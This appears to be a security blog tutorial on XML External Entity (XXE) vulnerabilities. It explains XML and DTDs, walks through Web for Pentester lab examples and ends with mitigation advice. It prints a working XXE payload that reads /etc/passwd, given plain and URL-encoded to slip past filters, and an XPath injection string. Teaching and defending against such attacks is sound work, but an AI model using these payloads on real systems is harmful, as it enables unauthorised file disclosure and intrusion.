What is XXE Vulnerability and How is it Exploited?

10 min readDec 11, 2020

In this article, we will search for answers to the questions about the vulnerabilities caused by XXE and how to exploit them.

To understand XXE, we first need to understand what XML is.

What is XML (Extensible Markup Language)?

XML stands for Extensible Markup Language. The creator is Tim Berners Lee, the creator of HTML, which we all know.

XML is a data communication, and data storage standard designed by the W3C (World Wide Web Consortium). XML enables data exchange between different systems.

By definition:

Extensible Markup Language (XML for short) is a markup language for creating documents that can be easily read by both people, and computing systems. It is a standard defined by W3C. In addition to storing data with this feature, it serves as an intermediate format for exchanging data between different systems. It is a simplified subset of SGML.

Nowadays many softwares, exchange data with other softwares over XML format. It is also possible to come across applications that use XML as the primary format. Since it is not suitable for random data access, it is not used for database purposes.

DataSet objects used in Microsoft’s .NET technology are in XML format. In addition, XML has become the infrastructure of office applications.

Separate handling of content, document structure, and form makes XML the ideal format for content management systems.

Let’s continue with a concrete example for a clearer understanding.

Let’s say I have an e-commerce site where I am responsible for content management. In this e-commerce site, carpets of Turkey’s top 8 brands are sold. Each brand has over 100 models, and each model has about 15 different types, and each type has at least 7 different sizes.

In this case, we have approximately:

• 8 brands• 800 models• 12,000 types• 84,000 measurements

that need to be uploaded to the website. If you were responsible for adding all these products to the site in as little as 1 week, could you do this?

If you try to enter the products one by one, and spend 2 minutes on each measure, you could enter all products in 168,000 minutes.

What does 168,000 minutes mean?

• 2,800 hours• 116 days• 3.8 months.

This is where XML becomes a savior. If you bring together all your products in a suitable XML format, you can upload a single XML file to your e-commerce site, and add your products in a very short time.

From this point of view it looks great, but it is necessary to examine every system with its positive, and negative aspects. To present a general framework, let’s look at the positive and negative aspects.

Positive aspects:

• Dynamic, and fast e-commerce sites with XML integration• Determining labels in universal language, and understandability• Ability to work in every system, and no dependency in terms of operability• Compatibility, and optimization between different systems• Easy to learn• Easy access to the data in it. Therefore, easy to work with applications to be developed.

Negative aspects:

• XML does not define how data is processed.• XML cannot do wonders on its own. XML requires parsers, and applications to process it.• The security flaws it accompanies

The most important point here is the vulnerability.

What is XXE (XML External Entity)?

When the data in XML is parsed, the vulnerability triggered by calling a specially defined entity is called XXE injection.

In order to understand this hole, there are a few other concepts that we need to understand.

Document Type (DOCTYPE)

Each XML file contains an entity called DOCTYPE. DOCTYPE entity specifies some information within it. These are the type of document being processed in the file, the name and version of the package in which the tags that make up the document are identified, where it can be found, definitions of additional files that make up the document, and so on.

Document Type Definition (DTD)

Although XML itself does not have a specific standard, data must be moved according to a common communication standard when moving data between two platforms. Therefore, this structure is called DTD. With DTD, standards can be defined for a particular system.

Considering DTD as a set of rules, we can have our DTD in XML or in an external .dtd file. And this can be divided into two separate classes as Internal and External.

Let’s share a short DTD example for clarity.

If you look at the example above, you can see that we created a simple guide.

If we look closely, we can see that this XML file is a dtd sample, and contains Parsed Character Data (#PCDATA).

Difference Between Public and Private

We mentioned at the beginning of the article external dtds are divided into public, and private. In the public part, the file is taken from a different address, while in the private part, the addressing is done through the server on which we communicate.

Exploit Samples

Since we have explained some important concepts, we can move on to the XXE Exploit section. We have made a short definiton in What is XXE. Now let’s open this up a little.

Let’s assume that there is an application that uses XML. If this application is open to our intervention when processing XML data, can we make a manipulation there? Can we access sensitive files? The answer to these questions is yes.

XXE is a server-based vulnerability, an injection case.

We thought that it would be more useful to examine XXE samples in the lab. For this reason, we will continue to move forward through Web for Pentester.

Example 1:

First of all, it is useful to examine the source code of each page first.

The page that opens:

Source Code:

Let’s take a closer look at the URL:

192.168.254.130/xml/example1.php?xml=<test>hacker</test>

When we examine the URL, there is a parameter named xml, and we can observe that the data entered between the test tags is assigned to the xml parameter, and it is displayed on the page. Let’s try first, what happens if we write something between the test labels? Let’s delete “hacker”, and write “serhan was here”.

192.168.254.130/xml/example1.php?xml=<test>serhan was here</test>

As a result, we can see what we wrote on the page.

Now let’s try to disarray this place. Let’s try entering a different parameter in XML. For example let’s make, xml = serhan.

192.168.254.130/xml/example1.php?xml=serhan

When we did this, it gave an error. And we love errors because sometimes these errors can provide us with comprehensive information about the system.

The error output we received:

When examining the error output, we found that it constitutes a problem that the parameter does not start with “<” sign. Then we can use it to exploit the vulnerability of the system. For this, let’s use our payload below.

<!DOCTYPE sb [<!ELEMENT sb ANY><!ENTITY serhan SYSTEM “file:////etc/passwd”>]><wsb>&serhan;</wsb>

Of course, before using it, let’s encode the url so that we don’t get stuck if any precautions are taken:

%3C%21DOCTYPE%20sb%20%5B%3C%21ELEMENT%20sb%20ANY%3E%3C%21ENTITY%20serhan%20SYSTEM%20%22file%3A%2F%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cwsb%3E%26serhan%3B%3C%2Fwsb%3E

With this payload, we have access to /etc/passwd, which can be found on Linux systems, and can reveal valuable information when accessed.

Example 2:

Let’s take a look at our page again:

Source code:

Let’s try by writing our name instead of hacker where it says Name=hacker. When we type Name=serhan nothing returned. That means we’re skipping something somewhere. Let’s try this with the label as we did in the previous example.

When we look at the source code in detail, we can see that an XML map is created with the x variable. Then the xml variable is assigned the x variable with simplexml_load_string module. The data in the name tag with the xpath variable is assigned to the GET request. With the while loop, the parameter from the xpath variable is suppressed on the screen.

Now we understand that name takes a parameter, but it will give an error when we write something other than admin or hacker. Then we can try to do something by using the hacker that says there.

Let’s try entering the following in the url: hacker’ or 1=1]/parent::node()/password%00

And we got our results.

XXE Attack Types

1. Using XXE to Access Files

To perform an XXE injection attack that pulls a random file from the server’s system, we need to change the sent XML in two ways.

We can edit a DOCTYPE element that contains the path to the file, and defines an external entity or to use the defined external entity, we can edit the data value in the XML returned in the application’s response.

Let’s make the situation clear with an example. Let’s suppose I check the stock level of a carpet by sending XML to the server on the carpet sales site mentioned at the beginning of the article:

If the above returns me stocks, what do you think the following returns?

If I have not created a specific defense mechanism against XXE attacks, a malicious hacker can access /etc/passwd by running the above code.

2. SSRF Attack with XXE

To execute an SSRF attack, and exploit the XXE vulnerability, we must define an external XML entity using the URL we target, and use the defined entity within a data value. If we can use the defined entity within a data value returned in the application’s response, we’ll be able to see the response from the URL within the application’s response so that we can gain two-way interaction in the backend.

3. Blind XXE

Many examples of XXE vulnerabilities are blind. This means that the application does not return the value of any external entities defined in the responses, and therefore it is not possible to retrieve the server-side files directly.

Blind XXE vulnerabilities can still be identified, and exploited, but more advanced techniques may be required for this.

4. XInclude Attack

Some applications take the data sent by the client, inserts it into an XML document on the server side, and then parses that document.

In this case, we cannot carry out a classic XXE attack because we cannot control the entire XML document, and define or modify a DOCTYPE element. However, we can do an XInclude attack instead. The XInclude attack is part of the XML specification that allows an XML document to be created from subdocuments. We can place the XInclude attack in any data value in an XML document, therefore the attack will only be placed in a server-side XML document, and can only be performed when we control a single data item.

For example:

5. Make an XXE Attack by Uploading a File

Some applications allow users to upload files that are later processed on the server side. Some common file formats use XML or include XML subcomponents. Examples of XML-based formats include office document formats such as DOCX, and image formats such as SVG.

For example, an application might allow users to upload images, and then process or validate them on the server. Even if the application expects to receive a format such as PNG or JPEG, the image processing library used can support SVG images. Because the SVG format uses XML, an attacker could send a harmful SVG image and trigger the XXE vulnerability.

Precautions for XXE Vulnerability

1. XML processor and libraries are always recommended to be the latest version.2. It is recommended not to run a version below SOAP 1.2.3. It is recommended to turn off the XML External Entity feature of all XML parsers in the application.4. It is recommended to use a filtering system that will work like “Whitelist”.5. Almost all XXE vulnerabilities occur because the application’s XML parsing library supports potentially dangerous XML features that the application does not need or want to use. The easiest, and most effective way to prevent XXE attacks is to disable these features. It is recommended to disable these features.6. It is recommended to disable resolution of external entities, and disable XInclude support.

Sources:
https://tr.wikipedia.org/wiki/XML
https://canyoupwn.me/tr-xml-external-entity-xxe/
https://gaissecurity.com/yazi/xml-external-entity-injection-and-oob-out-of-band-data-retrieval
https://www.yusufsezer.com.tr/xml-dtd-nedir